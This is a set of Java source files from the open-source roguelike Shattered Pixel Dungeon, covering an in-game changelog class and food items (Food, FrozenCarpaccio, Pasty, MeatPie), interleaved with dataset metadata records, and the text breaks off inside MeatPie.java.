"qsc_codejava_frac_lines_print": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/ui/changelist/v0_1_X_Changes.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.ui.changelist;
import com.shatteredpixel.shatteredpixeldungeon.items.Ankh;
import com.shatteredpixel.shatteredpixeldungeon.items.food.Blandfruit;
import com.shatteredpixel.shatteredpixeldungeon.sprites.ItemSprite;
import com.shatteredpixel.shatteredpixeldungeon.sprites.ItemSpriteSheet;
import com.shatteredpixel.shatteredpixeldungeon.ui.Icons;
import com.shatteredpixel.shatteredpixeldungeon.ui.Window;
import java.util.ArrayList;
public class v0_1_X_Changes {
public static void addAllChanges( ArrayList<ChangeInfo> changeInfos ){
ChangeInfo changes = new ChangeInfo( "v0.1.X", true, "");
changes.hardlight( Window.TITLE_COLOR);
changeInfos.add(changes);
add_v0_1_1_Changes(changeInfos);
add_v0_1_0_Changes(changeInfos);
}
public static void add_v0_1_1_Changes( ArrayList<ChangeInfo> changeInfos ){
ChangeInfo changes = new ChangeInfo("v0.1.1", false, "");
changes.hardlight(Window.TITLE_COLOR);
changeInfos.add(changes);
changes.addButton( new ChangeButton(Icons.get(Icons.SHPX), "Developer Commentary",
"_-_ Released August 15th, 2014\n" +
"_-_ 10 days after Shattered v0.1.0\n" +
"\n" +
"Dev commentary will be added here in the future."));
changes.addButton( new ChangeButton(new Blandfruit(),
"Players who chance upon gardens or who get lucky while trampling grass may come across a new plant: the _Blandfruit._\n\n" +
"As the name implies, the fruit from this plant is pretty unexceptional, and will barely do anything for you on its own. Perhaps there is some way to prepare the fruit with another ingredient..."));
changes.addButton( new ChangeButton(new ItemSprite(new Ankh()), "Revival Item Changes",
"When the Dew Vial was initially added to Pixel Dungeon, its essentially free revive made ankhs pretty useless by comparison. " +
"To fix this, both items have been adjusted to combine to create a more powerful revive.\n\n" +
"Dew Vial nerfed:\n" +
"_-_ Still grants a full heal at full charge, but grants less healing at partial charge.\n" +
"_-_ No longer revives the player if they die.\n\n" +
"Ankh buffed:\n" +
"_-_ Can now be blessed with a full dew vial, to gain the vial's old revive effect."));
changes.addButton( new ChangeButton(new ItemSprite(ItemSpriteSheet.SCROLL_BERKANAN, null), "Misc Item Changes",
"Sungrass buffed:\n" +
"_-_ Heal scaling now scales with max hp.\n\n" +
"Scroll of Psionic Blast rebalanced:\n" +
"_-_ Now deals less self damage, and damage is more consistent.\n" +
"_-_ Duration of self stun/blind effect increased.\n\n" +
"Scroll of lullaby reworked:\n" +
"_-_ No longer instantly sleeps enemies, now afflicts them with drowsy, which turns into magical sleep.\n" +
"_-_ Magically slept enemies will only wake up when attacked.\n" +
"_-_ Hero is also affected, and will be healed by magical sleep."));
}
public static void add_v0_1_0_Changes( ArrayList<ChangeInfo> changeInfos ){
ChangeInfo changes = new ChangeInfo("v0.1.0", false, "");
changes.hardlight(Window.TITLE_COLOR);
changeInfos.add(changes);
changes.addButton( new ChangeButton(Icons.get(Icons.SHPX), "Developer Commentary",
"_-_ Released August 5th, 2014\n" +
"_-_ 69 days after Pixel Dungeon v1.7.1\n" +
"_-_ 9 days after v1.7.1 source release\n" +
"\n" +
"Dev commentary will be added here in the future."));
changes.addButton( new ChangeButton(new ItemSprite(ItemSpriteSheet.SEED_EARTHROOT, null), "Seed Changes",
"_-_ Blindweed buffed, now cripples as well as blinds.\n\n" +
"_-_ Sungrass nerfed, heal scales up over time, total heal reduced by combat.\n\n" +
"_-_ Earthroot nerfed, damage absorb down to 50% from 100%, total shield unchanged.\n\n" +
"_-_ Icecap buffed, freeze effect is now much stronger in water."));
changes.addButton( new ChangeButton(new ItemSprite(ItemSpriteSheet.POTION_SILVER, null), "Potion Changes",
"_-_ Potion of Purity buffed, immunity duration increased to 10 turns from 5, clear effect radius increased.\n\n" +
"_-_ Potion of Frost buffed, freeze effect is now much stronger in water."));
changes.addButton( new ChangeButton(new ItemSprite(ItemSpriteSheet.SCROLL_BERKANAN, null), "Scroll Changes",
"_-_ Scroll of Psionic blast reworked, now rarer and much stronger, but deals damage to the hero.\n\n" +
"_-_ Scroll of Challenge renamed to Scroll of Rage, now amoks nearby enemies."));
}
}
| 5,335 | v0_1_X_Changes | java | en | java | code | {"qsc_code_num_words": 737, "qsc_code_num_chars": 5335.0, "qsc_code_mean_word_length": 5.16689281, "qsc_code_frac_words_unique": 0.39755767, "qsc_code_frac_chars_top_2grams": 0.00630252, "qsc_code_frac_chars_top_3grams": 0.03991597, "qsc_code_frac_chars_top_4grams": 0.06512605, "qsc_code_frac_chars_dupe_5grams": 0.39338235, "qsc_code_frac_chars_dupe_6grams": 0.3019958, "qsc_code_frac_chars_dupe_7grams": 0.26418067, "qsc_code_frac_chars_dupe_8grams": 0.25761555, "qsc_code_frac_chars_dupe_9grams": 0.24369748, "qsc_code_frac_chars_dupe_10grams": 0.22715336, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.01641587, "qsc_code_frac_chars_whitespace": 0.17788191, "qsc_code_size_file_byte": 5335.0, "qsc_code_num_lines": 111.0, "qsc_code_num_chars_line_max": 205.0, "qsc_code_num_chars_line_mean": 48.06306306, "qsc_code_frac_chars_alphabet": 0.85180119, "qsc_code_frac_chars_comments": 0.14620431, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.17142857, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.15714286, "qsc_code_frac_chars_string_length": 0.50823271, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 0.0, "qsc_codejava_frac_lines_func_ratio": 0.04285714, "qsc_codejava_score_lines_no_logic": 0.15714286, "qsc_codejava_frac_words_no_modifier": 0.75, "qsc_codejava_frac_words_legal_var_name": 1.0, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 0.0, "qsc_codejava_frac_lines_print": 0.0} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 0, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/items/food/FrozenCarpaccio.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.items.food;
import com.shatteredpixel.shatteredpixeldungeon.actors.buffs.Barkskin;
import com.shatteredpixel.shatteredpixeldungeon.actors.buffs.Bleeding;
import com.shatteredpixel.shatteredpixeldungeon.actors.buffs.Buff;
import com.shatteredpixel.shatteredpixeldungeon.actors.buffs.Cripple;
import com.shatteredpixel.shatteredpixeldungeon.actors.buffs.Drowsy;
import com.shatteredpixel.shatteredpixeldungeon.actors.buffs.Hunger;
import com.shatteredpixel.shatteredpixeldungeon.actors.buffs.Invisibility;
import com.shatteredpixel.shatteredpixeldungeon.actors.buffs.Poison;
import com.shatteredpixel.shatteredpixeldungeon.actors.buffs.Slow;
import com.shatteredpixel.shatteredpixeldungeon.actors.buffs.Vertigo;
import com.shatteredpixel.shatteredpixeldungeon.actors.buffs.Weakness;
import com.shatteredpixel.shatteredpixeldungeon.actors.hero.Hero;
import com.shatteredpixel.shatteredpixeldungeon.effects.Speck;
import com.shatteredpixel.shatteredpixeldungeon.messages.Messages;
import com.shatteredpixel.shatteredpixeldungeon.sprites.ItemSpriteSheet;
import com.shatteredpixel.shatteredpixeldungeon.utils.GLog;
import com.watabou.utils.Random;
public class FrozenCarpaccio extends Food {
{
image = ItemSpriteSheet.CARPACCIO;
energy = Hunger.HUNGRY/2f;
}
@Override
protected void satisfy(Hero hero) {
super.satisfy(hero);
effect(hero);
}
public int price() {
return 10 * quantity;
}
public static void effect(Hero hero){
switch (Random.Int( 5 )) {
case 0:
GLog.i( Messages.get(FrozenCarpaccio.class, "invis") );
Buff.affect( hero, Invisibility.class, Invisibility.DURATION );
break;
case 1:
GLog.i( Messages.get(FrozenCarpaccio.class, "hard") );
Buff.affect( hero, Barkskin.class ).set( hero.HT / 4, 1 );
break;
case 2:
GLog.i( Messages.get(FrozenCarpaccio.class, "refresh") );
Buff.detach( hero, Poison.class );
Buff.detach( hero, Cripple.class );
Buff.detach( hero, Weakness.class );
Buff.detach( hero, Bleeding.class );
Buff.detach( hero, Drowsy.class );
Buff.detach( hero, Slow.class );
Buff.detach( hero, Vertigo.class);
break;
case 3:
GLog.i( Messages.get(FrozenCarpaccio.class, "better") );
if (hero.HP < hero.HT) {
hero.HP = Math.min( hero.HP + hero.HT / 4, hero.HT );
hero.sprite.emitter().burst( Speck.factory( Speck.HEALING ), 1 );
}
break;
}
}
public static Food cook( MysteryMeat ingredient ) {
FrozenCarpaccio result = new FrozenCarpaccio();
result.quantity = ingredient.quantity();
return result;
}
}
| 3,384 | FrozenCarpaccio | java | en | java | code | {"qsc_code_num_words": 412, "qsc_code_num_chars": 3384.0, "qsc_code_mean_word_length": 6.17961165, "qsc_code_frac_words_unique": 0.38834951, "qsc_code_frac_chars_top_2grams": 0.11351139, "qsc_code_frac_chars_top_3grams": 0.25373134, "qsc_code_frac_chars_top_4grams": 0.27651218, "qsc_code_frac_chars_dupe_5grams": 0.34603299, "qsc_code_frac_chars_dupe_6grams": 0.31618225, "qsc_code_frac_chars_dupe_7grams": 0.0, "qsc_code_frac_chars_dupe_8grams": 0.0, "qsc_code_frac_chars_dupe_9grams": 0.0, "qsc_code_frac_chars_dupe_10grams": 0.0, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.0100069, "qsc_code_frac_chars_whitespace": 0.14361702, "qsc_code_size_file_byte": 3384.0, "qsc_code_num_lines": 93.0, "qsc_code_num_chars_line_max": 75.0, "qsc_code_num_chars_line_mean": 36.38709677, "qsc_code_frac_chars_alphabet": 0.86853002, "qsc_code_frac_chars_comments": 0.23079196, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.06060606, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.00845179, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 0.0, "qsc_codejava_frac_lines_func_ratio": 0.06060606, "qsc_codejava_score_lines_no_logic": 0.34848485, "qsc_codejava_frac_words_no_modifier": 0.8, "qsc_codejava_frac_words_legal_var_name": 1.0, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 1.0, "qsc_codejava_frac_lines_print": 0.0} | 0 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 1, "qsc_code_frac_chars_top_4grams": 1, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 0, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/items/food/Food.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.items.food;
import com.shatteredpixel.shatteredpixeldungeon.Assets;
import com.shatteredpixel.shatteredpixeldungeon.Badges;
import com.shatteredpixel.shatteredpixeldungeon.Statistics;
import com.shatteredpixel.shatteredpixeldungeon.actors.buffs.Buff;
import com.shatteredpixel.shatteredpixeldungeon.actors.buffs.Hunger;
import com.shatteredpixel.shatteredpixeldungeon.actors.buffs.Recharging;
import com.shatteredpixel.shatteredpixeldungeon.actors.hero.Hero;
import com.shatteredpixel.shatteredpixeldungeon.effects.Speck;
import com.shatteredpixel.shatteredpixeldungeon.effects.SpellSprite;
import com.shatteredpixel.shatteredpixeldungeon.items.Item;
import com.shatteredpixel.shatteredpixeldungeon.items.scrolls.ScrollOfRecharging;
import com.shatteredpixel.shatteredpixeldungeon.messages.Messages;
import com.shatteredpixel.shatteredpixeldungeon.sprites.ItemSpriteSheet;
import com.shatteredpixel.shatteredpixeldungeon.utils.GLog;
import com.watabou.noosa.audio.Sample;
import java.util.ArrayList;
public class Food extends Item {
public static final float TIME_TO_EAT = 3f;
public static final String AC_EAT = "EAT";
public float energy = Hunger.HUNGRY;
public String message = Messages.get(this, "eat_msg");
{
stackable = true;
image = ItemSpriteSheet.RATION;
bones = true;
}
@Override
public ArrayList<String> actions( Hero hero ) {
ArrayList<String> actions = super.actions( hero );
actions.add( AC_EAT );
return actions;
}
@Override
public void execute( Hero hero, String action ) {
super.execute( hero, action );
if (action.equals( AC_EAT )) {
detach( hero.belongings.backpack );
satisfy(hero);
GLog.i( message );
foodProc( hero );
hero.sprite.operate( hero.pos );
hero.busy();
SpellSprite.show( hero, SpellSprite.FOOD );
Sample.INSTANCE.play( Assets.SND_EAT );
hero.spend( TIME_TO_EAT );
Statistics.foodEaten++;
Badges.validateFoodEaten();
}
}
protected void satisfy( Hero hero ){
Buff.affect(hero, Hunger.class).satisfy( energy );
}
public static void foodProc( Hero hero ){
switch (hero.heroClass) {
case WARRIOR:
if (hero.HP < hero.HT) {
hero.HP = Math.min( hero.HP + 5, hero.HT );
hero.sprite.emitter().burst( Speck.factory( Speck.HEALING ), 1 );
}
break;
case MAGE:
//1 charge
Buff.affect( hero, Recharging.class, 4f );
ScrollOfRecharging.charge( hero );
break;
case ROGUE:
case HUNTRESS:
break;
}
}
@Override
public boolean isUpgradable() {
return false;
}
@Override
public boolean isIdentified() {
return true;
}
@Override
public int price() {
return 10 * quantity;
}
}
| 3,514 | Food | java | en | java | code | {"qsc_code_num_words": 422, "qsc_code_num_chars": 3514.0, "qsc_code_mean_word_length": 6.10900474, "qsc_code_frac_words_unique": 0.4478673, "qsc_code_frac_chars_top_2grams": 0.09891389, "qsc_code_frac_chars_top_3grams": 0.22110163, "qsc_code_frac_chars_top_4grams": 0.23894492, "qsc_code_frac_chars_dupe_5grams": 0.1927851, "qsc_code_frac_chars_dupe_6grams": 0.08572537, "qsc_code_frac_chars_dupe_7grams": 0.0, "qsc_code_frac_chars_dupe_8grams": 0.0, "qsc_code_frac_chars_dupe_9grams": 0.0, "qsc_code_frac_chars_dupe_10grams": 0.0, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.00819952, "qsc_code_frac_chars_whitespace": 0.1670461, "qsc_code_size_file_byte": 3514.0, "qsc_code_num_lines": 128.0, "qsc_code_num_chars_line_max": 82.0, "qsc_code_num_chars_line_mean": 27.453125, "qsc_code_frac_chars_alphabet": 0.87256577, "qsc_code_frac_chars_comments": 0.2250996, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.09638554, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.00367242, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 0.0, "qsc_codejava_frac_lines_func_ratio": 0.07228916, "qsc_codejava_score_lines_no_logic": 0.31325301, "qsc_codejava_frac_words_no_modifier": 0.85714286, "qsc_codejava_frac_words_legal_var_name": 1.0, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 1.0, "qsc_codejava_frac_lines_print": 0.0} | 0 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 1, "qsc_code_frac_chars_top_4grams": 1, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 0, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/items/food/Pasty.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.items.food;
import com.shatteredpixel.shatteredpixeldungeon.actors.buffs.Buff;
import com.shatteredpixel.shatteredpixeldungeon.actors.buffs.Hunger;
import com.shatteredpixel.shatteredpixeldungeon.actors.buffs.Recharging;
import com.shatteredpixel.shatteredpixeldungeon.actors.hero.Hero;
import com.shatteredpixel.shatteredpixeldungeon.effects.Speck;
import com.shatteredpixel.shatteredpixeldungeon.items.scrolls.ScrollOfRecharging;
import com.shatteredpixel.shatteredpixeldungeon.messages.Messages;
import com.shatteredpixel.shatteredpixeldungeon.sprites.ItemSpriteSheet;
import java.util.Calendar;
public class Pasty extends Food {
//TODO: implement fun stuff for other holidays
//TODO: probably should externalize this if I want to add any more festive stuff.
private enum Holiday{
NONE,
EASTER, //TBD
HWEEN,//2nd week of october though first day of november
XMAS //3rd week of december through first week of january
}
private static Holiday holiday;
static{
holiday = Holiday.NONE;
final Calendar calendar = Calendar.getInstance();
switch(calendar.get(Calendar.MONTH)){
case Calendar.JANUARY:
if (calendar.get(Calendar.WEEK_OF_MONTH) == 1)
holiday = Holiday.XMAS;
break;
case Calendar.OCTOBER:
if (calendar.get(Calendar.WEEK_OF_MONTH) >= 2)
holiday = Holiday.HWEEN;
break;
case Calendar.NOVEMBER:
if (calendar.get(Calendar.DAY_OF_MONTH) == 1)
holiday = Holiday.HWEEN;
break;
case Calendar.DECEMBER:
if (calendar.get(Calendar.WEEK_OF_MONTH) >= 3)
holiday = Holiday.XMAS;
break;
}
}
{
reset();
energy = Hunger.STARVING;
bones = true;
}
@Override
public void reset() {
super.reset();
switch(holiday){
case NONE:
name = Messages.get(this, "pasty");
image = ItemSpriteSheet.PASTY;
break;
case HWEEN:
name = Messages.get(this, "pie");
image = ItemSpriteSheet.PUMPKIN_PIE;
break;
case XMAS:
name = Messages.get(this, "cane");
image = ItemSpriteSheet.CANDY_CANE;
break;
}
}
@Override
protected void satisfy(Hero hero) {
super.satisfy(hero);
switch(holiday){
case NONE:
break; //do nothing extra
case HWEEN:
//heals for 10% max hp
hero.HP = Math.min(hero.HP + hero.HT/10, hero.HT);
hero.sprite.emitter().burst( Speck.factory( Speck.HEALING ), 1 );
break;
case XMAS:
Buff.affect( hero, Recharging.class, 2f ); //half of a charge
ScrollOfRecharging.charge( hero );
break;
}
}
@Override
public String info() {
switch(holiday){
case NONE: default:
return Messages.get(this, "pasty_desc");
case HWEEN:
return Messages.get(this, "pie_desc");
case XMAS:
return Messages.get(this, "cane_desc");
}
}
@Override
public int price() {
return 20 * quantity;
}
}
| 3,626 | Pasty | java | en | java | code | {"qsc_code_num_words": 462, "qsc_code_num_chars": 3626.0, "qsc_code_mean_word_length": 5.58008658, "qsc_code_frac_words_unique": 0.41125541, "qsc_code_frac_chars_top_2grams": 0.05934833, "qsc_code_frac_chars_top_3grams": 0.13266098, "qsc_code_frac_chars_top_4grams": 0.13653995, "qsc_code_frac_chars_dupe_5grams": 0.18929403, "qsc_code_frac_chars_dupe_6grams": 0.15089216, "qsc_code_frac_chars_dupe_7grams": 0.03723817, "qsc_code_frac_chars_dupe_8grams": 0.0, "qsc_code_frac_chars_dupe_9grams": 0.0, "qsc_code_frac_chars_dupe_10grams": 0.0, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.01049425, "qsc_code_frac_chars_whitespace": 0.18532819, "qsc_code_size_file_byte": 3626.0, "qsc_code_num_lines": 134.0, "qsc_code_num_chars_line_max": 83.0, "qsc_code_num_chars_line_mean": 27.05970149, "qsc_code_frac_chars_alphabet": 0.86222072, "qsc_code_frac_chars_comments": 0.29591837, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.30526316, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.01527615, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.00746269, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 0.0, "qsc_codejava_frac_lines_func_ratio": 0.04210526, "qsc_codejava_score_lines_no_logic": 0.15789474, "qsc_codejava_frac_words_no_modifier": 0.8, "qsc_codejava_frac_words_legal_var_name": 1.0, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 1.0, "qsc_codejava_frac_lines_print": 0.0} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 0, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/items/food/MeatPie.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.items.food;
import com.shatteredpixel.shatteredpixeldungeon.actors.buffs.Buff;
import com.shatteredpixel.shatteredpixeldungeon.actors.buffs.Hunger;
import com.shatteredpixel.shatteredpixeldungeon.actors.buffs.WellFed;
import com.shatteredpixel.shatteredpixeldungeon.actors.hero.Hero;
import com.shatteredpixel.shatteredpixeldungeon.items.Item;
import com.shatteredpixel.shatteredpixeldungeon.sprites.ItemSpriteSheet;
import java.util.ArrayList;
public class MeatPie extends Food {
{
image = ItemSpriteSheet.MEAT_PIE;
energy = Hunger.STARVING*2f;
}
@Override
protected void satisfy(Hero hero) {
super.satisfy( hero );
Buff.affect(hero, WellFed.class).reset();
}
@Override
public int price() {
return 40 * quantity;
}
public static class Recipe extends com.shatteredpixel.shatteredpixeldungeon.items.Recipe {
@Override
